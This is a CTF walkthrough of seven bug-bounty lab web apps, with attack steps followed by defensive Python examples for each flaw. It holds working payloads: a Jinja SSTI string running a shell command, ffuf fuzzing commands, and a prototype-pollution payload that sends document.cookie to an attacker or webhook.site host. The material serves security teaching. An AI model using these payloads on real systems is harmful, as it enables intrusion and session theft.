
Hack The System - Bug Bounty CTF Playground

Criticalops

Criticalops is a web application designed to monitor several critical infrastructure sites in the XYZ region. Users usually use this website to report unusual behaviour, which is also called a ticket. They've asked you to hunt for any potential security issues in their application and retrieve the flag stored in their site.

πŸ“ Related Bug Bounty Reports
Bug Report #1 - JWT client-side

  1. decode the JWT token and:
  2. change to admin?
  3. use one of the IDs from /api/controls
  4. should I find `Sign JWT: Secret`? -> yes, I just should have used the search in devtools.
  5. craft a JWT token with admin:admin
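The root cause in this challenge is an HS256 signing secret that shipped inside the front-end bundle: whoever can read the JavaScript can mint any claims they like, and the server cannot tell a forged token from a real one. The following is an added example (not the challenge's code or any library's API) that implements HS256 minting and verification with the standard library only, pins the algorithm so `alg: none` is refused, and adds the check a defender actually wants: a build-time gate that fails when a configured server secret appears verbatim in the client bundle. The secret, bundle snippet and claim names are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_hs256(claims: dict, secret: str) -> str:
    """Build an HS256 JWT. Anyone holding `secret` can do this, which is the
    whole problem when the secret is bundled into the front-end."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}".encode("ascii")
    signature = hmac.new(secret.encode("utf-8"), signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(signature)}"


def verify_hs256(token: str, secret: str):
    """Return the claims when the signature is valid, otherwise None.
    The algorithm is pinned: a header claiming alg=none or RS256 is rejected."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        signature = b64url_decode(sig_b64)
    except (ValueError, UnicodeDecodeError):
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret.encode("utf-8"),
                        f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):   # constant-time comparison
        return None
    return json.loads(b64url_decode(payload_b64))


def bundle_leaks_secret(bundle_js: str, server_secrets: dict) -> list:
    """CI gate: names of server-side secrets that appear verbatim in a built
    client bundle. Run it against the production build before deploying."""
    return sorted(name for name, value in server_secrets.items() if value and value in bundle_js)


if __name__ == "__main__":
    # Constructed scenario: the signing secret leaked into the client bundle.
    secret = "example-shared-secret"
    bundle = "const signJwt = (claims) => jwt.sign(claims, 'example-shared-secret');"
    token = mint_hs256({"sub": "alice", "role": "user"}, secret)
    print("claims accepted by the server:", verify_hs256(token, secret))
    print("secrets found in bundle:", bundle_leaks_secret(bundle, {"JWT_SECRET": secret}))
```

The bundle check is deliberately dumb (substring match) because that is exactly how the secret was found here: a text search in devtools. The real fix is architectural: the signing key lives only on the server, and role decisions come from a server-side lookup of the authenticated subject rather than from a claim the client could have written.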

NovaEnergy

NovaEnergy is an internal web application used as a file-sharing system. This site can only be accessed by employees of the NovaEnergy company. You're tasked to hunt for any vulnerabilities that could lead to breaches in their site.

πŸ“ Related Bug Bounty Reports
Bug Report #1 - Bypass Email verification
Bug Report #2 - Bypass Email verification in Mozilla

  1. Start fuzzing - get the /api endpoint
  2. fuzz API endpoints:

    ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/api/api-endpoints.txt:FUZZ -u http://<ip>:<port>/FUZZ -recursion -recursion-depth 3 -ic -t 100


    -> get the Swagger UI

  3. get the token from /userDetails for the registered account and call /email-verify with it

  4. login

Hack The System - Bug Bounty CTF

JinjaCare

Jinjacare is a web application designed to help citizens manage and access their COVID-19 vaccination records. The platform allows users to store their vaccination history and generate digital certificates. They've asked you to hunt for any potential security issues in their application and retrieve the flag stored in their site.

πŸ“ Related Bug Bounty Reports
Bug Report #1 - RCE via SSTI
Bug Report #2 - SSTI

  • register an account and change the name to {{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /flag.txt').read() }}
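The name field is rendered as template *source* rather than as template *data*, which is what turns a profile field into Jinja SSTI. The following is an added example, not the challenge's code: a hypothetical greeting rendered three ways. `greet_vulnerable` reproduces the bug, `greet_safe` shows the fix (constant template, user input passed as a variable, autoescape on), and `greet_sandboxed` shows why `SandboxedEnvironment` alone is not the fix: it blocks dunder attribute walks but still evaluates arbitrary expressions.

```python
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Hypothetical greeting shown after registration; `name` is attacker-controlled input.
GREETING = "Welcome, {{ name }}!"


def greet_vulnerable(name: str) -> str:
    """Bug: user input is concatenated into the template source, so any
    {{ ... }} inside the name is evaluated by the template engine."""
    return Environment().from_string("Welcome, " + name + "!").render()


def greet_safe(name: str) -> str:
    """Fix: the template is a constant and the name is passed as data.
    Braces in the name are printed literally; autoescape neutralises HTML."""
    return Environment(autoescape=True).from_string(GREETING).render(name=name)


def greet_sandboxed(name: str) -> str:
    """Defence in depth only: the sandbox refuses __class__-style attribute
    access, but the injection itself still happens (7*7 is still evaluated)."""
    try:
        return SandboxedEnvironment().from_string("Welcome, " + name + "!").render()
    except SecurityError:
        return "rejected"


if __name__ == "__main__":
    probe = "{{ 7 * 7 }}"                     # harmless SSTI probe
    print("vulnerable:", greet_vulnerable(probe))   # arithmetic evaluated
    print("safe:      ", greet_safe(probe))         # braces printed as-is
    print("sandboxed: ", greet_sandboxed(probe))    # still evaluated
    print("sandboxed: ", greet_sandboxed("{{ ''.__class__.__mro__ }}"))
```

Detection-wise, a `{{` or `{%` sequence arriving in a profile field is a strong signal worth alerting on, but input filtering is not the fix; only the separation of template source from data in `greet_safe` is.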

NeoVault

Neovault is a trusted banking application that allows users to effortlessly transfer funds to one another and conveniently download their transaction history. We invite you to explore the application for any potential vulnerabilities and uncover the flag hidden within its depths.

📝 Related Bug Bounty Reports
Bug Report #1 - Mongo Object ID Prediction
Bug Report #2 - IDOR

# fuzz mongoid with list from mongo-objectid-predict
ffuf -w mongo-objectid-predict.txt -X POST \
  -u http://94.237.48.12:52151/api/v2/transactions \
  -H "Content-Type: application/json" \
  -H "Cookie: token=<token>" \
  -d '{"toUserId":"FUZZ","amount":1,"description":"1","category":"Entertainment"}' \
  -mr "OK"   # match on the response body
  • and you get `685fecb057c495db3d91dde1 [Status: 201, Size: 48, Words: 3, Lines: 1, Duration: 97ms]`; the transactions tab then shows "Sent to user_with_flag" <- and stuck here
  • so:
    1. The FindSomething / JS Recon Buddy extensions even show /api/v1/ among the endpoints in the Next.js chunks
    2. mongo-objectid-predict also has a --backward flag to generate more IDs (optional)
    3. After getting user_with_flag, start testing the API endpoints
    4. download-transactions has a suspiciously empty request body
    5. _id is not provided -> intercept the download request, change the path to v1 and add _id to the body -> Forward
    6. Flag downloaded
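Two separate weaknesses combine here: MongoDB ObjectIds are guessable (4-byte timestamp, 5-byte per-process random value, 3-byte counter, so ids minted by one server process differ only in time and counter), and the v1 download endpoint trusted a client-supplied `_id`. The following is an added example, not the challenge's code: it decodes the ObjectId seen above, shows the "same process" test that makes neighbouring ids enumerable, and places the vulnerable v1 handler pattern beside the fixed one. The in-memory store, the second ObjectId and the handler names are constructed for the demo.

```python
from dataclasses import dataclass
from datetime import datetime, timezone


@dataclass(frozen=True)
class ObjectIdParts:
    timestamp: int   # 4 bytes: seconds since the Unix epoch
    random: str      # 5 bytes: per-process random value, fixed for the process lifetime
    counter: int     # 3 bytes: incremented for every document the process creates

    def created_at(self) -> datetime:
        return datetime.fromtimestamp(self.timestamp, tz=timezone.utc)


def parse_object_id(oid: str) -> ObjectIdParts:
    if len(oid) != 24:
        raise ValueError("ObjectId must be 24 hex characters")
    int(oid, 16)  # raises ValueError on non-hex input
    return ObjectIdParts(int(oid[:8], 16), oid[8:18].lower(), int(oid[18:], 16))


def same_process(a: str, b: str) -> bool:
    """Ids sharing the 5 random bytes came from one server process: only the
    timestamp and counter differ, which is why a neighbour can be predicted.
    An ObjectId is an identifier, never a capability or an authorization."""
    return parse_object_id(a).random == parse_object_id(b).random


# Constructed sample store keyed by user ObjectId (the second id is made up).
TRANSACTIONS = {
    "685fecb057c495db3d91dde1": [{"to": "user_with_flag", "amount": 1}],
    "685fecb057c495db3d91dde2": [{"to": "alice", "amount": 250}],
}


def download_transactions_v1(session_user: str, body: dict) -> list:
    """Vulnerable pattern (IDOR): an `_id` in the request body overrides the
    authenticated user, so any guessable id yields another user's history."""
    return TRANSACTIONS.get(body.get("_id", session_user), [])


def download_transactions_v2(session_user: str, body: dict) -> list:
    """Fixed pattern: the subject comes only from the authenticated session;
    whatever the client says about identity is ignored."""
    return TRANSACTIONS.get(session_user, [])


if __name__ == "__main__":
    parts = parse_object_id("685fecb057c495db3d91dde1")
    print(parts, parts.created_at().isoformat())
    print("same process:", same_process("685fecb057c495db3d91dde1", "685fecb057c495db3d91dde2"))
    me, other = "685fecb057c495db3d91dde2", {"_id": "685fecb057c495db3d91dde1"}
    print("v1 leaks:", download_transactions_v1(me, other))
    print("v2 keeps:", download_transactions_v2(me, other))
```

Deprecated API versions that are still routed (v1 next to v2) are a recurring source of exactly this bug, so an inventory of live routes, not just the documented ones, belongs in the review.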

CitiSmart

Citismart is an innovative Smart City monitoring platform aimed at detecting anomalies in public sector operations. We invite you to explore the application for any potential vulnerabilities and uncover the hidden flag within its depths.

📝 Related Bug Bounty Reports
Bug Report #1 - Expose Hidden Endpoints
Bug Report #2 - SSRF

  1. katana finds something: katana -u http://94.237.54.192:30476/ -jc -silent | tee js_katana.txt
  2. cat js_katana.txt | xargs -I{} python3 LinkFinder/linkfinder.py -i {} -o cli | tee endpoints.txt finds the API endpoints

  3. Or just use chrome/brave devtools

let n = {
    endpoints: {
        me: "/api/auth/me",
        login: "/api/auth/login",
        logout: "/api/auth/logout",
        dashboard: "/api/dashboard/endpoints",
        dashboardDelete: "/api/dashboard/endpoints/",
        dashboardData: "/api/dashboard/metrics"
    }
};
  • intercept the response and change the value to true;
  • to check for SSRF, send a request to /api/dashboard/endpoints with an interactsh or webhook.site URL;
  • fuzz for internal port scanning (cross-site port attack, XSPA):
ffuf -X POST -u "http://<ip>:<port>/api/dashboard/endpoints/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/local-ports.txt -H "Cookie: token=token" -H "Content-Type: application/json" -d '{"url": "http://FUZZ#","sector": "Port: FUZZ"}' -fw 3

127.0.0.1:80            [Status: 500, Size: 66, Words: 6, Lines: 1, Duration: 117ms]
127.0.0.1:3000          [Status: 500, Size: 66, Words: 6, Lines: 1, Duration: 105ms]
127.0.0.1:5000          [Status: 500, Size: 66, Words: 6, Lines: 1, Duration: 101ms]
127.0.0.1:5984          [Status: 500, Size: 66, Words: 6, Lines: 1, Duration: 97ms]
127.0.0.1:5986          [Status: 500, Size: 66, Words: 6, Lines: 1, Duration: 103ms]
  • after fuzzing, check the results
  • an entry is created only with # appended to the URL ("the reason for adding # after the port is to push the state of the application to the client; it's just like bookmarking the current state of the application." - 2Fa0n)
  • HackTricks - CouchDB: manually enumerate 127.0.0.1:5984/_all_dbs -> /citismart/_all_docs? and finally http://127.0.0.1:5984/citismart/FLAG# to get the flag from the /metrics response
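The monitoring feature fetches whatever URL the user registers, so loopback and RFC 1918 targets, and the unauthenticated CouchDB on 5984, become reachable through the server. The following is an added example, not the challenge's code: a URL validator of the kind the `/api/dashboard/endpoints` handler should have run. It allows only http(s), refuses embedded credentials, resolves hostnames and rejects any record that is loopback, private, link-local, multicast, reserved or an IPv4-mapped IPv6 literal, and drops the fragment, because `#` is never sent to the server and `http://127.0.0.1:5984/_all_dbs#` still fetches localhost. The hostnames and addresses in the demo and the `resolver` parameter are constructed.

```python
import ipaddress
import socket
from urllib.parse import urlsplit, urlunsplit

ALLOWED_SCHEMES = {"http", "https"}


def _system_resolver(host: str) -> list:
    """Resolve with the OS resolver; this also normalises odd literals such
    as 0x7f000001 or 2130706433 that ipaddress itself will not parse."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public_address(ip_text: str) -> bool:
    ip = ipaddress.ip_address(ip_text)
    if ip.version == 6 and ip.ipv4_mapped is not None:   # ::ffff:127.0.0.1 is still loopback
        ip = ip.ipv4_mapped
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_monitor_url(url: str, resolver=_system_resolver):
    """Return (ok, detail): detail is the normalised URL the server may fetch,
    or the reason the submission was refused."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        targets = [str(ipaddress.ip_address(host))]      # literal address
    except ValueError:
        try:
            targets = resolver(host)                     # hostname: check every record
        except OSError:
            return False, f"cannot resolve {host!r}"
    if not targets:
        return False, f"no address records for {host!r}"
    for ip_text in targets:
        if not is_public_address(ip_text):
            return False, f"{host} -> {ip_text} is not a public address"
    # Fragments are client-side only; strip them so the stored URL is what is fetched.
    normalised = urlunsplit((parts.scheme.lower(), parts.netloc, parts.path or "/", parts.query, ""))
    return True, normalised


if __name__ == "__main__":
    for candidate in ("http://127.0.0.1:5984/_all_dbs#",
                      "http://169.254.169.254/latest/meta-data/",
                      "file:///etc/passwd",
                      "http://[::ffff:127.0.0.1]/"):
        print(candidate, "->", validate_monitor_url(candidate))
```

Validation at submit time is necessary but not sufficient: a hostname can resolve differently when the monitor later fetches it (DNS rebinding), so the fetcher should connect to the address that passed the check, or re-run the check on each fetch, and redirects returned by the target need the same treatment.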

SpeedNet

Speednet is an Internet Service Provider platform that enables users to purchase internet services. We invite you to participate in our bug bounty program to identify any potential vulnerabilities within the application and retrieve the flag hidden on the site. For your testing, we have provided additional email services. Please find the details below:

Email Site: http://IP:PORT/emails/
Email Address: test@email.htb

📝 Related Bug Bounty Reports
Bug Report #1 - Graphql Batching
Bug Report #2 - Graphql Introspection
Bug Report #3 - Alias-based Query Batching
Bug Report #4 - Hacking Graphql Endpoints

  • register a new user and find the GraphQL endpoint
  • change the userId in the GetUserProfile query -> admin data
  • from the GraphQL Introspection report, use the query:

    {
        "query": "query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"
    }
    

    -> mutation objects found: devForgotPassword and Invoice

  • replace forgotPassword with devForgotPassword -> reset token

  • reset the password with that token and brute-force the OTP with bbctf_otpbypass_graphqlbatch.py to get the JWT token from the VerifyTwoFactor mutation response
  • log in to the created account, change the token in local storage and open Billing -> flag (or use { "query":"query { invoiceHistory(limit:10) { id number amount status dueDate } }" })
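Three GraphQL weaknesses stack up in this challenge: introspection enabled in production (which exposed `devForgotPassword`), a rate limit counted per HTTP request rather than per operation, and alias batching that packs many `VerifyTwoFactor` attempts into one request. The following is an added example, not the challenge's code and not a real GraphQL library: a pre-parser gate that a server or gateway can run on each document. It lists the root-level selections (counting every alias separately, skipping arguments, nested fields and fragment definitions), refuses introspection unless explicitly enabled, caps the number of root selections, and reports per-field counts so the rate limiter can charge N OTP attempts for N aliases. The mutation name and test documents are constructed.

```python
import re
from collections import Counter

INTROSPECTION_FIELDS = {"__schema", "__type"}
_STRING = re.compile(r'"(?:\\.|[^"\\])*"')                 # string literals (may contain braces)
_SPREAD = re.compile(r"\.\.\.\s*(?:on\s+)?\w*")            # ...FragmentName / ... on Type
_DIRECTIVE = re.compile(r"@\w+")                            # @include, @skip, ...
_SELECTION = re.compile(r"(?:(?P<alias>[_A-Za-z]\w*)\s*:\s*)?(?P<field>[_A-Za-z]\w*)")


def root_selections(query: str) -> list:
    """Return [(alias_or_None, field), ...] for the selections at the root of
    the operation. Arguments, nested selection sets and fragment definitions
    are skipped, so the same mutation aliased N times appears N times."""
    src = _STRING.sub('""', query)          # braces inside string arguments no longer matter
    depth = parens = 0
    prefix, body, in_fragment = [], [], False
    for ch in src:
        if ch == "{":
            if depth == 0:                   # a top-level set after "fragment X on T" is not an operation
                in_fragment = "".join(prefix).strip().startswith("fragment")
                prefix = []
            depth += 1
        elif ch == "}":
            depth -= 1
        elif depth == 0:
            prefix.append(ch)
        elif depth == 1 and not in_fragment:
            if ch == "(":
                parens += 1
            elif ch == ")":
                parens -= 1
            elif parens == 0:                # outside argument lists
                body.append(ch)
    text = _DIRECTIVE.sub(" ", _SPREAD.sub(" ", "".join(body)))
    return [(m.group("alias"), m.group("field")) for m in _SELECTION.finditer(text)]


def inspect_request(query: str, max_root_selections: int = 5,
                    introspection_enabled: bool = False) -> dict:
    """Gate one GraphQL document. `per_field` tells the rate limiter how many
    invocations of each root field this single HTTP request represents."""
    selections = root_selections(query)
    per_field = Counter(field for _, field in selections)
    verdict = {"allowed": True, "reason": None, "per_field": dict(per_field)}
    if not introspection_enabled and per_field.keys() & INTROSPECTION_FIELDS:
        verdict.update(allowed=False, reason="introspection is disabled outside development")
    elif len(selections) > max_root_selections:
        verdict.update(allowed=False,
                       reason=f"{len(selections)} root selections exceed the limit of {max_root_selections}")
    return verdict


if __name__ == "__main__":
    # Constructed documents, not captured traffic.
    introspection = 'query IntrospectionQuery{__schema{queryType{name}}}fragment FullType on __Type{kind name}'
    batch = "mutation { " + " ".join(
        f'a{i}: VerifyTwoFactor(otp: "{i:04d}") {{ token }}' for i in range(3)) + " }"
    print(inspect_request(introspection))
    print(inspect_request(batch, max_root_selections=2))
```

This gate covers alias batching inside one document; JSON-array batching (several documents in one HTTP body) needs the same treatment one level up, with the array length capped and each element passed through `inspect_request`. A six-digit OTP also needs a per-account attempt counter that is decremented by `per_field["VerifyTwoFactor"]`, not by one per request.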

Sattrack

Welcome to the Sattrack Bug Bounty Invitational for Authorized Users! Sattrack is a premier platform dedicated to monitoring satellite data, exclusively available to our selected authorized partners. We invite you to participate in our limited bug bounty program, aimed at identifying and addressing any security vulnerabilities within our application. Your contributions are invaluable in helping us maintain the integrity and security of our services. You may use partner@rockyou.xyz:partn3r123 as valid credentials. To ensure optimal site performance, we have established a dedicated support page at /report. Here, you can submit the URLs of any issues (non-security related) you encounter, and our admin team will promptly investigate and provide assistance.

📝 Related Bug Bounty Reports
Bug Report #1 - Mermaid Prototype Pollution
Bug Report #2 - Prototype Pollution
Bug Report #3 - JSON Escaping

  • on the login page: JS_FILES: [] is an array that takes a path (executed as a script?)
  • from the dashboard:
function shareData(type) {
      const shareUrl = window.location.origin + `/partner/share?type=${type}&data=${encodeURIComponent(JSON.stringify(data))}`;
      // ...
}
  • from login error: GET /login?message=%7B%22text%22:+%22Invalid+email+or+password%22%7D HTTP/1.1
  • hints from report #1: %%{init: {<JSON_OBJECT>}}%% -> %%{init: { '__proto__': {'polluted': 'asdf'}} }%% and from report #2: https://blog.swiftype.com/#__proto__[asd]=alert(document.domain)
  • Mozilla - Object prototypes
  • pre-escaped, double-encoded, prototype-pollution-bait payload structure:
{
    "text": "Invalid email or password",
    "__proto__": {
        "JS_FILES": [
            "/partner/share?type=\"};fetch('ATTACKER_Domain/?exploit='+document.cookie)//"
        ]
    }
}

[!cite] ChatGPT: "__proto__" -> typical prototype pollution key (trying to set __proto__ on an object); "JS_FILES" -> injecting into a JavaScript array used to load scripts. The string contains `};fetch('ATTACKER_Domain/?exploit=' + document.cookie)//`, so the attacker tries to break out of a JavaScript context, close the path with `"};` and then run fetch(...).

  • payload: http://127.0.0.1/login?message={"__proto__":{"JS_FILES":["/partner/share?type=%252522};fetch('https://webhook.site/<webhook_token>/'%25252Bdocument.cookie)%253B%252F%252F"]}}
  • replace the token, change the path to /admin, and good night
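The server side of this chain is a `?message=` parameter that is parsed as JSON, merged into page configuration without filtering `__proto__`, and then embedded into a `<script>` block without HTML-aware escaping (the subject of report #3). The following is an added example, not the challenge's code: the handling the login page should have applied. It parses the parameter with a `json.loads` hook that refuses `__proto__`, `constructor` and `prototype` at any depth, enforces the only shape the page needs (`{"text": "<string>"}`), and serialises the result so it is safe inside `<script>`. `MAX_MESSAGE_BYTES` and the sample inputs are constructed.

```python
import json

POLLUTING_KEYS = {"__proto__", "constructor", "prototype"}
MAX_MESSAGE_BYTES = 512   # constructed limit; legitimate messages are one short sentence


def _reject_polluting_keys(pairs):
    """object_pairs_hook: json.loads calls this for every object at every
    depth, so nested {"__proto__": {...}} bait is refused before the
    document can be merged into anything on the JavaScript side."""
    for key, _ in pairs:
        if key in POLLUTING_KEYS:
            raise ValueError(f"forbidden key {key!r}")
    return dict(pairs)


def parse_login_message(raw: str) -> dict:
    """Parse ?message= into the one shape the login page renders: {"text": str}.
    Anything else (arrays, extra keys, non-string text) is rejected."""
    if len(raw.encode("utf-8")) > MAX_MESSAGE_BYTES:
        raise ValueError("message too long")
    obj = json.loads(raw, object_pairs_hook=_reject_polluting_keys)
    if not isinstance(obj, dict) or set(obj) != {"text"} or not isinstance(obj["text"], str):
        raise ValueError("message must be an object with a single string field 'text'")
    return obj


def is_rejected(raw: str) -> bool:
    try:
        parse_login_message(raw)
    except ValueError:          # json.JSONDecodeError is a ValueError too
        return True
    return False


def json_for_script(value) -> str:
    """Serialise for embedding inside <script>: plain JSON is not HTML-safe,
    because "</script>" inside a string closes the block. ensure_ascii already
    escapes U+2028/U+2029; <, > and & are escaped as \\uXXXX, which JSON.parse
    and a JS literal both decode back to the original characters."""
    return (json.dumps(value, ensure_ascii=True)
            .replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026"))


if __name__ == "__main__":
    print(parse_login_message('{"text": "Invalid email or password"}'))
    print("pollution bait rejected:", is_rejected('{"__proto__": {"JS_FILES": ["/x"]}}'))
    print(json_for_script({"text": "</script><img src=x>"}))
```

Deny-listing three keys is the last line of defence, not the first: the page should never recursively merge client-supplied JSON into its configuration at all, and an allow-list of expected fields (as `parse_login_message` enforces) removes the whole class of bug rather than the known keys.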